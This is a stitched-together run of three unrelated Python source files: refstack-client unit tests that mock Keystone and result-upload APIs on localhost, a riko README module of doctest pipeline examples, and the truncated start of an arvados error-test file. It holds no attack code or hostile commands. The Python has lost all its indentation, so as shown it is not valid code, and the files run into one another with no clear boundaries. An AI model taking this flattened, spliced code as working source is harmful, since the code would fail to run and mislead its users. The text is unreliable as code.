client._get_cpid_from_keystone(auth_version, auth_url, content)
client._generate_cpid_from_endpoint.assert_called_with(auth_url)
# Test when the catalog is empty.
ks3_catalog_empty = {'token': {'catalog': []}}
client._generate_cpid_from_endpoint = MagicMock()
@httmock.all_requests
def keystone_api_v3_mock2(url, request):
return httmock.response(201, ks3_catalog_empty)
with httmock.HTTMock(keystone_api_v3_mock2):
client._get_cpid_from_keystone(auth_version, auth_url, content)
client._generate_cpid_from_endpoint.assert_called_with(auth_url)
# Test when there is no service catalog.
ks3_no_catalog = {'token': {}}
client._generate_cpid_from_endpoint = MagicMock()
@httmock.all_requests
def keystone_api_v3_mock3(url, request):
return httmock.response(201, ks3_no_catalog)
with httmock.HTTMock(keystone_api_v3_mock3):
client._get_cpid_from_keystone(auth_version, auth_url, content)
client._generate_cpid_from_endpoint.assert_called_with(auth_url)
# Test when catalog has other non-identity services.
ks3_other_services = {'token': {
'catalog': [{'type': 'compute',
'id': 'test-id1'},
{'type': 'identity',
'id': 'test-id2'}]
}}
client._generate_cpid_from_endpoint = MagicMock()
@httmock.all_requests
def keystone_api_v3_mock4(url, request):
return httmock.response(201, ks3_other_services)
with httmock.HTTMock(keystone_api_v3_mock4):
cpid = client._get_cpid_from_keystone(auth_version,
auth_url,
content)
self.assertFalse(client._generate_cpid_from_endpoint.called)
self.assertEqual('test-id2', cpid)
def test_get_cpid_from_keystone_failure_handled(self):
"""Test that get cpid from keystone API failure handled."""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
client.logger.warning = MagicMock()
client._generate_cpid_from_endpoint = MagicMock()
client.conf.add_section('auth')
client.conf.set('auth',
'test_accounts_file',
'%s/test-accounts.yaml' % self.test_path)
self.mock_data()
accounts = [
{
'tenant_name': 'tenant_name',
'tenant_id': 'admin_tenant_id',
'password': '<PASSWORD>'
}
]
self.patch(
'refstack_client.refstack_client.read_accounts_yaml',
return_value=accounts)
configs = client._get_keystone_config(client.conf)
auth_version, url, content = client._generate_keystone_data(configs)
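        # The Keystone request is made to fail here (the mock never returns a
        # valid token response), so the client should fall back to generating
        # the CPID from the endpoint URL.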
@httmock.urlmatch(netloc=r'(.*\.)?127.0.0.1$', path='/v2/tokens')
def keystone_api_mock(auth_version, url, request):
return None
with httmock.HTTMock(keystone_api_mock):
client._get_cpid_from_keystone(auth_version, url, content)
client._generate_cpid_from_endpoint.assert_called_with(url)
def test_generate_cpid_from_endpoint(self):
"""
Test that an endpoint's hostname is properly hashed.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
cpid = client._generate_cpid_from_endpoint('http://some.url:5000/v2')
expected = hashlib.md5('some.url'.encode('utf-8')).hexdigest()
self.assertEqual(expected, cpid)
with self.assertRaises(ValueError):
client._generate_cpid_from_endpoint('some.url:5000/v2')
def test_form_result_content(self):
"""
Test that the request content is formed into the expected format.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
content = client._form_result_content(1, 1, ['tempest.sample.test'])
expected = {'cpid': 1,
'duration_seconds': 1,
'results': ['tempest.sample.test']}
self.assertEqual(expected, content)
def test_save_json_result(self):
"""
Test that the results are properly written to a JSON file.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
results = {'cpid': 1,
'duration_seconds': 1,
'results': ['tempest.sample.test']}
temp_file = tempfile.NamedTemporaryFile()
client._save_json_results(results, temp_file.name)
# Get the JSON that was written to the file and make sure it
# matches the expected value.
json_file = open(temp_file.name)
json_data = json.load(json_file)
json_file.close()
self.assertEqual(results, json_data)
def test_get_passed_tests(self):
"""
Test that only passing tests are retrieved from a subunit file.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
subunit_file = self.test_path + "/.testrepository/0"
results = client.get_passed_tests(subunit_file)
expected = [
{'name': 'tempest.passed.test'},
{'name': 'tempest.tagged_passed.test',
'uuid': '0146f675-ffbd-4208-b3a4-60eb628dbc5e'}
]
self.assertEqual(expected, results)
@mock.patch('six.moves.input')
def test_user_query(self, mock_input):
client = rc.RefstackClient(rc.parse_cli_args(self.mock_argv()))
self.assertTrue(client._user_query('42?'))
mock_input.return_value = 'n'
cli_args = self.mock_argv()
cli_args.remove('-y')
client = rc.RefstackClient(rc.parse_cli_args(cli_args))
self.assertFalse(client._user_query('42?'))
mock_input.return_value = 'yes'
self.assertTrue(client._user_query('42?'))
def test_upload_prompt(self):
"""
Test the _upload_prompt method.
"""
client = rc.RefstackClient(rc.parse_cli_args(self.mock_argv()))
# When user says yes.
client._user_query = MagicMock(return_value=True)
client.post_results = MagicMock()
client._upload_prompt({'some': 'data'})
client.post_results.assert_called_with(
'http://127.0.0.1', {'some': 'data'}, sign_with=None
)
# When user says no.
client._user_query = MagicMock(return_value=False)
client.post_results = MagicMock()
client._upload_prompt({'some': 'data'})
self.assertFalse(client.post_results.called)
def test_post_results(self):
"""
Test the post_results method, ensuring a requests call is made.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.logger.info = MagicMock()
content = {'duration_seconds': 0,
'cpid': 'test-id',
'results': [{'name': 'tempest.passed.test', 'uid': None}]}
expected_response = json.dumps({'test_id': 42})
@httmock.urlmatch(netloc=r'(.*\.)?127.0.0.1$', path='/v1/results/')
def refstack_api_mock(url, request):
return expected_response
with httmock.HTTMock(refstack_api_mock):
client.post_results("http://127.0.0.1", content)
client.logger.info.assert_called_with(
'http://127.0.0.1/v1/results/ Response: '
'%s' % expected_response)
def test_post_results_with_sign(self):
"""
        Test the post_results method with a signing key, ensuring a signed
        requests call is made.
"""
argv = self.mock_argv(command='upload', priv_key='rsa_key')
argv.append('fake.json')
args = rc.parse_cli_args(argv)
client = rc.RefstackClient(args)
client.logger.info = MagicMock()
content = {'duration_seconds': 0,
'cpid': 'test-id',
'results': [{'name': 'tempest.passed.test'}]}
expected_response = json.dumps({'test_id': 42})
@httmock.urlmatch(netloc=r'(.*\.)?127.0.0.1$', path='/v1/results/')
def refstack_api_mock(url, request):
return expected_response
with httmock.HTTMock(refstack_api_mock):
rsapath = os.path.join(self.test_path, 'rsa_key')
client.post_results("http://127.0.0.1", content, sign_with=rsapath)
client.logger.info.assert_called_with(
'http://127.0.0.1/v1/results/ Response: %s' %
expected_response)
def test_run_tempest(self):
"""
Test that the test command will run the tempest script using the
default configuration.
"""
args = rc.parse_cli_args(
self.mock_argv(verbose='-vv', test_cases='tempest.api.compute'))
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
mock_popen = self.patch(
'refstack_client.refstack_client.subprocess.Popen',
return_value=MagicMock(returncode=0))
self.patch("os.path.isfile", return_value=True)
self.mock_data()
client.get_passed_tests = MagicMock(return_value=[{'name': 'test'}])
client.logger.info = MagicMock()
client._save_json_results = MagicMock()
client.post_results = MagicMock()
client._get_keystone_config = MagicMock(
return_value=self.v2_config)
client.test()
mock_popen.assert_called_with(
['%s/tools/with_venv.sh' % self.test_path, 'tempest', 'run',
'--serial', '--regex', 'tempest.api.compute'],
stderr=None
)
self.assertFalse(client.post_results.called)
def test_run_tempest_upload(self):
"""
Test that the test command will run the tempest script and call
post_results when the --upload argument is passed in.
"""
argv = self.mock_argv(verbose='-vv',
test_cases='tempest.api.compute')
argv.insert(2, '--upload')
args = rc.parse_cli_args(argv)
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
mock_popen = self.patch(
'refstack_client.refstack_client.subprocess.Popen',
return_value=MagicMock(returncode=0))
self.patch("os.path.isfile", return_value=True)
self.mock_data()
client.get_passed_tests = MagicMock(return_value=['test'])
client.post_results = MagicMock()
client._save_json_results = MagicMock()
client._get_keystone_config = MagicMock(
return_value=self.v2_config)
client._get_cpid_from_keystone = MagicMock()
client.test()
mock_popen.assert_called_with(
['%s/tools/with_venv.sh' % self.test_path, 'tempest', 'run',
'--serial', '--regex', 'tempest.api.compute'],
stderr=None
)
self.assertTrue(client.post_results.called)
def test_run_tempest_upload_with_sign(self):
"""
        Test that the test command will run the tempest script and call
        post_results with a signing key when the --upload argument is passed in.
"""
argv = self.mock_argv(verbose='-vv', priv_key='rsa_key',
test_cases='tempest.api.compute')
argv.insert(2, '--upload')
args = rc.parse_cli_args(argv)
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
mock_popen = self.patch(
'refstack_client.refstack_client.subprocess.Popen',
return_value=MagicMock(returncode=0)
)
self.patch("os.path.isfile", return_value=True)
self.mock_data()
client.get_passed_tests = MagicMock(return_value=['test'])
client.post_results = MagicMock()
client._save_json_results = MagicMock()
client._get_keystone_config = MagicMock(
return_value=self.v2_config)
client._get_cpid_from_keystone = MagicMock(
return_value='test-id')
client.test()
mock_popen.assert_called_with(
['%s/tools/with_venv.sh' % self.test_path, 'tempest', 'run',
'--serial', '--regex', 'tempest.api.compute'],
stderr=None
)
self.assertTrue(client.post_results.called)
client.post_results.assert_called_with(
'http://127.0.0.1',
{'duration_seconds': 0,
'cpid': 'test-id',
'results': ['test']},
sign_with='rsa_key'
)
@mock.patch('refstack_client.list_parser.TestListParser.'
'create_include_list')
@mock.patch('refstack_client.list_parser.'
'TestListParser.get_normalized_test_list')
def test_run_tempest_with_test_list(self, mock_normalize,
mock_include_list):
"""Test that the Tempest script runs with a test list file."""
argv = self.mock_argv(verbose='-vv')
argv.extend(['--test-list', 'test-list.txt'])
args = rc.parse_cli_args(argv)
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
mock_popen = self.patch(
'refstack_client.refstack_client.subprocess.Popen',
return_value=MagicMock(returncode=0))
self.patch("os.path.isfile", return_value=True)
self.patch("os.path.getsize", return_value=4096)
self.mock_data()
client.get_passed_tests = MagicMock(return_value=[{'name': 'test'}])
client._save_json_results = MagicMock()
client.post_results = MagicMock()
mock_normalize.return_value = '/tmp/some-list'
mock_include_list.return_value = '/tmp/some-list'
client._get_keystone_config = MagicMock(
return_value=self.v2_config)
client.test()
mock_include_list.assert_called_with('test-list.txt')
# TODO(kopecmartin) rename the below argument when refstack-client
# uses tempest which contains the following change in its code:
# https://review.opendev.org/c/openstack/tempest/+/768583
mock_popen.assert_called_with(
['%s/tools/with_venv.sh' % self.test_path, 'tempest', 'run',
'--serial', '--whitelist_file', '/tmp/some-list'],
stderr=None
)
def test_run_tempest_no_conf_file(self):
"""
Test when a nonexistent configuration file is passed in.
"""
args = rc.parse_cli_args(self.mock_argv(conf_file_name='ptn-khl'))
client = rc.RefstackClient(args)
self.assertRaises(SystemExit, client.test)
def test_forbidden_conf_file(self):
"""
        Test when the user passes in a file they do not have
        read access to.
"""
file = tempfile.NamedTemporaryFile()
# Remove read access
os.chmod(file.name, 0o220)
args = rc.parse_cli_args(self.mock_argv(conf_file_name=file.name))
client = rc.RefstackClient(args)
self.assertRaises(SystemExit, client.test)
def test_run_tempest_nonexisting_directory(self):
"""
Test when the Tempest directory does not exist.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = "/does/not/exist"
self.assertRaises(SystemExit, client.test)
def test_run_tempest_result_tag(self):
"""
Check that the result JSON file is renamed with the result file tag
when the --result-file-tag argument is passed in.
"""
argv = self.mock_argv(verbose='-vv',
test_cases='tempest.api.compute')
argv.insert(2, '--result-file-tag')
argv.insert(3, 'my-test')
args = rc.parse_cli_args(argv)
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
mock_popen = self.patch(
'refstack_client.refstack_client.subprocess.Popen',
return_value=MagicMock(returncode=0))
self.patch("os.path.isfile", return_value=True)
self.mock_data()
client.get_passed_tests = MagicMock(return_value=['test'])
client._save_json_results = MagicMock()
client._get_keystone_config = MagicMock(
return_value=self.v2_config)
client._get_cpid_from_keystone = MagicMock(
return_value='test-id')
client.test()
mock_popen.assert_called_with(
['%s/tools/with_venv.sh' % self.test_path, 'tempest', 'run',
'--serial', '--regex', 'tempest.api.compute'],
stderr=None
)
# Since '1' is in the next-stream file, we expect the JSON output file
# to be 'my-test-1.json'.
expected_file = os.path.join(self.test_path, '.testrepository',
'my-test-1.json')
client._save_json_results.assert_called_with(mock.ANY, expected_file)
def test_failed_run(self):
"""
Test when the Tempest script returns a non-zero exit code.
"""
self.patch('refstack_client.refstack_client.subprocess.Popen',
return_value=MagicMock(returncode=1))
args = rc.parse_cli_args(self.mock_argv(verbose='-vv'))
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
self.mock_data()
client.logger.warning = MagicMock()
client._get_keystone_config = MagicMock(
return_value=self.v2_config)
client._get_cpid_from_keystone = MagicMock()
client.test()
self.assertTrue(client.logger.warning.called)
def test_upload(self):
"""
Test that the upload command runs as expected.
"""
upload_file_path = self.test_path + "/.testrepository/0.json"
args = rc.parse_cli_args(
self.mock_argv(command='upload', priv_key='rsa_key') +
[upload_file_path])
client = rc.RefstackClient(args)
client.post_results = MagicMock()
client.upload()
expected_json = {
'duration_seconds': 0,
'cpid': 'test-id',
'results': [
{'name': 'tempest.passed.test'},
{'name': 'tempest.tagged_passed.test',
'uuid': '0146f675-ffbd-4208-b3a4-60eb628dbc5e'}
]
}
client.post_results.assert_called_with('http://127.0.0.1',
expected_json,
sign_with='rsa_key')
def test_subunit_upload(self):
"""
Test that the subunit upload command runs as expected.
"""
upload_file_path = self.test_path + "/.testrepository/0"
args = rc.parse_cli_args(
self.mock_argv(command='upload-subunit', priv_key='rsa_key') +
['--keystone-endpoint', 'http://0.0.0.0:5000/v2.0'] +
[upload_file_path])
client = rc.RefstackClient(args)
client.post_results = MagicMock()
client.upload_subunit()
expected_json = {
'duration_seconds': 0,
'cpid': hashlib.md5('0.0.0.0'.encode('utf-8')).hexdigest(),
'results': [
{'name': 'tempest.passed.test'},
{'name': 'tempest.tagged_passed.test',
'uuid': '0146f675-ffbd-4208-b3a4-60eb628dbc5e'}
]
}
client.post_results.assert_called_with('http://127.0.0.1',
expected_json,
sign_with='rsa_key')
def test_upload_nonexisting_file(self):
"""
Test when the file to be uploaded does not exist.
"""
upload_file_path = self.test_path + "/.testrepository/foo.json"
args = rc.parse_cli_args(['upload', upload_file_path,
'--url', 'http://api.test.org'])
client = rc.RefstackClient(args)
self.assertRaises(SystemExit, client.upload)
def test_yield_results(self):
"""
Test the yield_results method, ensuring that results are retrieved.
"""
args = rc.parse_cli_args(self.mock_argv(command='list'))
client = rc.RefstackClient(args)
expected_response = {
"pagination": {
"current_page": 1,
"total_pages": 1
},
"results": [
{
"cpid": "42",
"created_at": "2015-04-28 13:57:05",
"test_id": "1",
"url": "http://127.0.0.1:8000/output.html?test_id=1"
},
{
"cpid": "42",
"created_at": "2015-04-28 13:57:05",
"test_id": "2",
"url": "http://127.0.0.1:8000/output.html?test_id=2"
}]}
@httmock.urlmatch(netloc=r'(.*\.)?127.0.0.1$', path='/v1/results/')
def refstack_api_mock(url, request):
return json.dumps(expected_response)
with httmock.HTTMock(refstack_api_mock):
results = client.yield_results("http://127.0.0.1")
self.assertEqual(expected_response['results'], next(results))
# Since Python3.7 StopIteration exceptions are transformed into
# RuntimeError (PEP 479):
# https://docs.python.org/3/whatsnew/3.7.html
self.assertRaises((StopIteration, RuntimeError), next, results)
@mock.patch('six.moves.input', side_effect=KeyboardInterrupt)
@mock.patch('sys.stdout', new_callable=MagicMock)
def test_list(self, mock_stdout, mock_input):
args = rc.parse_cli_args(self.mock_argv(command='list'))
client = rc.RefstackClient(args)
results = [[{"cpid": "42",
"created_at": "2015-04-28 13:57:05",
"test_id": "1",
"url": "http://127.0.0.1:8000/output.html?test_id=1"},
{"cpid": "42",
"created_at": "2015-04-28 13:57:05",
"test_id": "2",
"url": "http://127.0.0.1:8000/output.html?test_id=2"}]]
mock_results = MagicMock()
mock_results.__iter__.return_value = results
client.yield_results = MagicMock(return_value=mock_results)
client.list()
self.assertTrue(mock_stdout.write.called)
def test_sign_pubkey(self):
"""
        Test that the sign command reads the public key and produces the
        expected signature.
"""
args = rc.parse_cli_args(['sign',
os.path.join(self.test_path, 'rsa_key')])
client = rc.RefstackClient(args)
pubkey, signature = client._sign_pubkey()
self.assertTrue(pubkey.decode('utf8').startswith('ssh-rsa AAAA'))
self.assertTrue(signature.decode('utf8').startswith('413cb954'))
def test_set_env_params(self):
"""
Test that the environment variables are correctly set.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
conf_dir = os.path.abspath(os.path.dirname(self.conf_file_name))
conf_file = os.path.basename(self.conf_file_name)
self.assertEqual(os.environ.get('TEMPEST_CONFIG_DIR'), conf_dir)
self.assertEqual(os.environ.get('TEMPEST_CONFIG'), conf_file)
@mock.patch('refstack_client.list_parser.TestListParser.'
'create_include_list')
def test_run_tempest_with_empty_test_list(self, mock_include_list):
"""Test that refstack-client can handle an empty test list file."""
argv = self.mock_argv(verbose='-vv')
argv.extend(['--test-list', 'foo.txt'])
args = rc.parse_cli_args(argv)
client = rc.RefstackClient(args)
self.mock_data()
self.patch(
'refstack_client.refstack_client.subprocess.Popen',
return_value=MagicMock(returncode=0))
client._get_keystone_config = MagicMock(return_value=self.v2_config)
client.tempest_dir = self.test_path
self.patch("os.path.isfile", return_value=True)
empty_file = tempfile.NamedTemporaryFile()
mock_include_list.return_value = empty_file.name
self.assertRaises(SystemExit, client.test)
def test_run_tempest_with_non_exist_test_list_file(self):
"""Test that refstack-client runs with a nonexistent test list file."""
argv = self.mock_argv(verbose='-vv')
argv.extend(['--test-list', 'foo.txt'])
args = rc.parse_cli_args(argv)
client = rc.RefstackClient(args)
self.mock_data()
self.patch(
'refstack_client.list_parser.TestListParser._get_tempest_test_ids',
return_value={'foo': ''})
self.patch(
'refstack_client.refstack_client.subprocess.Popen',
return_value=MagicMock(returncode=0))
client._get_keystone_config = MagicMock(return_value=self.v2_config)
client.tempest_dir = self.test_path
self.assertRaises(IOError, client.test)
# -*- coding: utf-8 -*-
# vim: sw=4:ts=4:expandtab
"""
README examples
~~~~~~~~~~~~~~~
Word Count
>>> import itertools as it
>>> from riko import get_path
>>> from riko.modules import fetchpage, strreplace, tokenizer, count
>>>
>>> ### Set the pipe configurations ###
>>> #
>>> # Notes:
>>> # - `get_path` just looks up files in the `data` directory to simplify
>>> # testing
>>> # - the `detag` option will strip all html tags from the result
>>> url = get_path('users.jyu.fi.html')
>>> fetch_conf = {
... 'url': url, 'start': '<body>', 'end': '</body>', 'detag': True}
>>> replace_conf = {'rule': {'find': '\\n', 'replace': ' '}}
>>> replace_kwargs = {'conf': replace_conf, 'assign': 'content'}
>>> token_kwargs = {'conf': {'delimiter': ' '}, 'emit': True}
>>>
>>> ### Create a workflow ###
>>> #
>>> # The following workflow will:
>>> # 1. fetch the url and return the content between the body tags
>>> # 2. replace newlines with spaces
>>> # 3. tokenize (split) the content by spaces, i.e., yield words
>>> # 4. count the words
>>> #
>>> # Note: because `fetchpage` and `strreplace` each return an iterator of
>>> # just one item, we can safely call `next` without fear of losing data
>>> page = next(fetchpage.pipe(conf=fetch_conf))
>>> replaced = next(strreplace.pipe(page, **replace_kwargs))
>>> words = tokenizer.pipe(replaced, **token_kwargs)
>>> counts = count.pipe(words, conf={'count_key': 'content'})
>>> next(counts) == {'$': 2}
True
>>> next(counts) == {'$Date:': 1}
True
>>> next(counts) == {'$Revision:': 1}
True
>>> ### Alternatively, create a SyncPipe workflow ###
>>> #
>>> # `SyncPipe` is a workflow convenience class that enables method
>>> # chaining and parallel processing
>>> from riko.collections import SyncPipe
>>>
>>> stream = (SyncPipe('fetchpage', conf=fetch_conf)
... .strreplace(conf=replace_conf, assign='content')
... .tokenizer(conf={'delimiter': ' '}, emit=True)
... .count(conf={'count_key': 'content'})
... .output)
>>>
>>> next(stream) == {'$': 2}
True
Fetching feeds
>>> from itertools import chain
>>> from riko import get_path
>>> from riko.modules import (
... fetch, fetchdata, fetchsitefeed, feedautodiscovery)
>>>
>>> ### Fetch a url ###
>>> stream = fetchdata.pipe(conf={'url': 'http://site.com/file.xml'})
>>>
>>> ### Fetch a filepath ###
>>> #
>>> # Note: `get_path` just looks up files in the `data` directory
>>> # to simplify testing
>>> conf = {'url': get_path('quote.json')}
>>> stream = fetchdata.pipe(conf=conf)
>>>
>>> # Same thing, but now memoize the url response
>>> conf['memoize'] = True
>>> stream = fetchdata.pipe(conf=conf)
>>>
>>> ### View the fetched data ###
>>> item = next(stream)
>>> 0.7841 < item['rates']['GBP'] < 0.7842
True
>>> ### Fetch an rss feed ###
>>> stream = fetch.pipe(conf={'url': get_path('feed.xml')})
>>>
>>> ### Fetch the first rss feed found ###
>>> stream = fetchsitefeed.pipe(conf={'url': get_path('cnn.html')})
>>>
>>> ### Find all rss links and fetch the feeds ###
>>> url = get_path('bbc.html')
>>> entries = feedautodiscovery.pipe(conf={'url': url})
>>> urls = [e['link'] for e in entries]
>>>
>>> stream = chain.from_iterable(
... fetch.pipe(conf={'url': url}) for url in urls)
>>>
>>> ### Alternatively, create a SyncCollection ###
>>> #
>>> # `SyncCollection` is a url fetching convenience class with support for
>>> # parallel processing
>>> from riko.collections import SyncCollection
>>>
>>> sources = [{'url': url} for url in urls]
>>> stream = SyncCollection(sources).fetch()
>>>
>>> ### View the fetched rss feed(s) ###
>>> #
>>> # Note: regardless of how you fetch an rss feed, it will have the same
>>> # structure
>>> intersection = [
... 'author', 'author.name', 'author.uri', 'dc:creator', 'id', 'link',
... 'pubDate', 'summary', 'title', 'y:id', 'y:published', 'y:title']
>>> item = next(stream)
>>> set(item).issuperset(intersection)
True
>>> item['title'] == 'Using NFC tags in the car'
True
>>> item['author'] == '<NAME>'
True
>>> item['link'] == 'http://www.greenhughes.com/content/using-nfc-tags-car'
True
Synchronous processing
>>> from itertools import chain
>>> from riko import get_path
>>> from riko.modules import fetch, filter, subelement, regex, sort
>>>
>>> ### Set the pipe configurations ###
>>> #
>>> # Note: `get_path` just looks up files in the `data` directory to
>>> # simplify testing
>>> fetch_conf = {'url': get_path('feed.xml')}
>>> filter_rule = {
... 'field': 'y:published', 'op': 'before', 'value': '2/5/09'}
>>> sub_conf = {'path': 'content.value'}
>>> sub_kwargs = {'conf': sub_conf, 'emit': True}
>>> match = r'(.*href=")([\\w:/.@]+)(".*)'
>>> regex_rule = {'field': 'content', 'match': match, 'replace': '$2'}
>>> regex_conf = {'rule': regex_rule}
>>> sort_conf = {'rule': {'sort_key': 'content', 'sort_dir': 'desc'}}
>>>
>>> ### Create a workflow ###
>>> #
>>> # The following workflow will:
>>> # 1. fetch the rss feed
>>> # 2. filter for items published before 2/5/2009
>>> # 3. extract the path `content.value` from each feed item
>>> # 4. replace the extracted text with the last href url contained
>>> # within it
>>> # 5. reverse sort the items by the replaced url
>>> #
>>> # Note: sorting is not lazy so take caution when using this pipe
>>> stream = fetch.pipe(conf=fetch_conf)
>>> filtered = filter.pipe(stream, conf={'rule': filter_rule})
>>> extracted = (subelement.pipe(i, **sub_kwargs) for i in filtered)
>>> flat_extract = chain.from_iterable(extracted)
>>> matched = (regex.pipe(i, conf=regex_conf) for i in flat_extract)
>>> flat_match = chain.from_iterable(matched)
>>> sorted_match = sort.pipe(flat_match, conf=sort_conf)
>>> next(sorted_match) == {'content': 'mailto:<EMAIL>'}
True
>>> ### Alternatively, create a SyncPipe workflow ###
>>> #
>>> # `SyncPipe` is a workflow convenience class that enables method
>>> # chaining, parallel processing, and eliminates the manual `map` and
>>> # `chain` steps
>>> from riko.collections import SyncPipe
>>>
>>> stream = (SyncPipe('fetch', conf=fetch_conf)
... .filter(conf={'rule': filter_rule})
... .subelement(conf=sub_conf, emit=True)
... .regex(conf={'rule': regex_rule})
... .sort(conf=sort_conf)
... .output)
>>>
>>> next(stream) == {'content': 'mailto:<EMAIL>'}
True
Parallel processing
>>> from riko import get_path
>>> from riko.collections import SyncPipe
>>>
>>> ### Set the pipe configurations ###
>>> #
>>> # Note: `get_path` just looks up files in the `data` directory to
>>> # simplify testing
>>> url = get_path('feed.xml')
>>> sub_conf = {'path': 'content.value'}
>>> match = r'(.*href=")([\\w:/.@]+)(".*)'
>>> regex_rule = {'field': 'content', 'match': match, 'replace': '$2'}
>>> filter_rule = {'field': 'content', 'op': 'contains', 'value': 'file'}
>>> strtransform_conf = {'rule': {'transform': 'rstrip', 'args': '/'}}
>>>
>>> ### Create a parallel SyncPipe workflow ###
>>> #
>>> # The following workflow will:
>>> # 1. fetch the rss feed
>>> # 3. extract the path `content.value` from each feed item
>>> # 4. replace the extracted text with the last href url contained
>>> # within it
>>> # 5. filter for items with local file urls (which happen to be rss
>>> # feeds)
>>> # 6. strip any trailing `\\` from the url
>>> # 7. remove duplicate urls
>>> # 8. fetch each rss feed
>>> # 9. Merge the rss feeds into a list
>>> stream = (SyncPipe('fetch', conf={'url': url}, parallel=True)
... .subelement(conf=sub_conf, emit=True)
... .regex(conf={'rule': regex_rule})
... .filter(conf={'rule': filter_rule})
... .strtransform(conf=strtransform_conf)
... .uniq(conf={'uniq_key': 'strtransform'})
... .fetch(conf={'url': {'subkey': 'strtransform'}})
... .list)
>>>
>>> len(stream)
25
Asynchronous processing
>>> from riko import get_path
>>> from riko.bado import coroutine, react, _issync, _isasync
>>> from riko.bado.mock import FakeReactor
>>> from riko.collections import AsyncPipe
>>>
>>> ### Set the pipe configurations ###
>>> #
>>> # Notes:
>>> # - `get_path` just looks up files in the `data` directory to simplify
>>> # testing
>>> # - the `dotall` option is used to match `.*` across newlines
>>> url = get_path('feed.xml')
>>> sub_conf = {'path': 'content.value'}
>>> match = r'(.*href=")([\\w:/.@]+)(".*)'
>>> regex_rule = {
... 'field': 'content', 'match': match, 'replace': '$2',
... 'dotall': True}
>>> filter_rule = {'field': 'content', 'op': 'contains', 'value': 'file'}
>>> strtransform_conf = {'rule': {'transform': 'rstrip', 'args': '/'}}
>>>
>>> ### Create an AsyncPipe workflow ###
>>> #
>>> # See `Parallel processing` above for the steps this performs
>>> @coroutine
... def run(reactor):
... stream = yield (AsyncPipe('fetch', conf={'url': url})
... .subelement(conf=sub_conf, emit=True)
... .regex(conf={'rule': regex_rule})
... .filter(conf={'rule': filter_rule})
... .strtransform(conf=strtransform_conf)
... .uniq(conf={'uniq_key': 'strtransform'})
... .fetch(conf={'url': {'subkey': 'strtransform'}})
... .list)
...
... print(len(stream))
...
>>> if _issync:
... 25
... else:
... try:
... react(run, _reactor=FakeReactor())
... except SystemExit:
... pass
25
Design Principles
# an operator
>>> from riko.modules.reverse import pipe
>>>
>>> stream = [{'title': 'riko pt. 1'}, {'title': 'riko pt. 2'}]
>>> next(pipe(stream)) == {'title': 'riko pt. 2'}
True
# a transformer
>>> import ctypes
>>> from riko.modules.hash import pipe
>>>
>>> _hash = ctypes.c_uint(hash('riko pt. 1')).value
>>> item = {'title': 'riko pt. 1'}
>>> stream = pipe(item, field='title')
>>> next(stream) == {'title': 'riko pt. 1', 'hash': _hash}
True
>>> from riko.modules.tokenizer import pipe
>>>
>>> item = {'title': 'riko pt. 1'}
>>> tokenizer_conf = {'delimiter': ' '}
>>> stream = pipe(item, conf=tokenizer_conf, field='title')
>>> next(stream) == {
... 'title': 'riko pt. 1',
... 'tokenizer': [
... {'content': 'riko'},
... {'content': 'pt.'},
... {'content': '1'}]}
True
>>> # In this case, if we just want the result, we can `emit` it instead
>>> stream = pipe(item, conf=tokenizer_conf, field='title', emit=True)
>>> next(stream) == {'content': 'riko'}
True
# an aggregator
>>> from riko.modules.count import pipe
>>>
>>> stream = [{'title': 'riko pt. 1'}, {'title': 'riko pt. 2'}]
>>> next(pipe(stream)) == {'count': 2}
True
# a source
>>> from riko.modules.itembuilder import pipe
>>>
>>> attrs = {'key': 'title', 'value': 'riko pt. 1'}
>>> next(pipe(conf={'attrs': attrs})) == {'title': 'riko pt. 1'}
True
# check metadata
>>> from riko.modules import fetchpage, count
>>>
>>> if _isasync:
... async_resp = ('processor', 'fetchpage', 'source')
... else:
... async_resp = (None, None, None)
>>>
>>> async_pdict = fetchpage.async_pipe.__dict__
>>> (async_pdict.get('type'), async_pdict.get('name')) == async_resp[:2]
True
>>> async_pdict.get('sub_type') == async_resp[2]
True
>>> pdict = count.pipe.__dict__
>>> sync_resp = ('operator', 'count', 'aggregator')
>>> (pdict['type'], pdict['name'], pdict['sub_type']) == sync_resp
True
# SyncPipe usage
>>> from riko.collections import SyncPipe
>>>
>>> _hash = ctypes.c_uint(hash("Let's talk about riko!")).value
>>> attrs = [
... {'key': 'title', 'value': 'riko pt. 1'},
... {'key': 'content', 'value': "Let's talk about riko!"}]
>>> sync_pipe = SyncPipe('itembuilder', conf={'attrs': attrs})
>>> sync_pipe.hash().list[0] == {
... 'title': 'riko pt. 1',
... 'content': "Let's talk about riko!",
... 'hash': _hash}
True
# Alternate conf usage
>>> from riko import get_path
>>> from riko.modules.fetch import pipe
>>>
>>> intersection = [
... 'author', 'author.name', 'author.uri', 'dc:creator', 'id', 'link',
... 'pubDate', 'summary', 'title', 'y:id', 'y:published', 'y:title']
>>> conf = {'url': {'subkey': 'url'}}
>>> result = pipe({'url': get_path('feed.xml')}, conf=conf)
>>> set(next(result)).issuperset(intersection)
True
"""
from pprint import pprint
from riko.collections import SyncPipe
attrs = [
{'key': 'title', 'value': 'riko pt. 1'},
{'key': 'content', 'value': "Let's talk about riko!"}]
ib_conf = {'attrs': attrs}
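# Minimal runnable workflow mirroring the docstring examples: build items with
# `itembuilder`, add a `hash` field, and pretty-print each emitted item.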
def pipe(test=False):
flow = SyncPipe('itembuilder', conf=ib_conf, test=test).hash()
for i in flow.output:
pprint(i)
<filename>sdk/python/tests/test_errors.py
#!/usr/bin/env python
import traceback
import unittest
import arvados.errors as arv_error
import arvados_testutil as tutil
class KeepRequestErrorTestCase(unittest.TestCase):
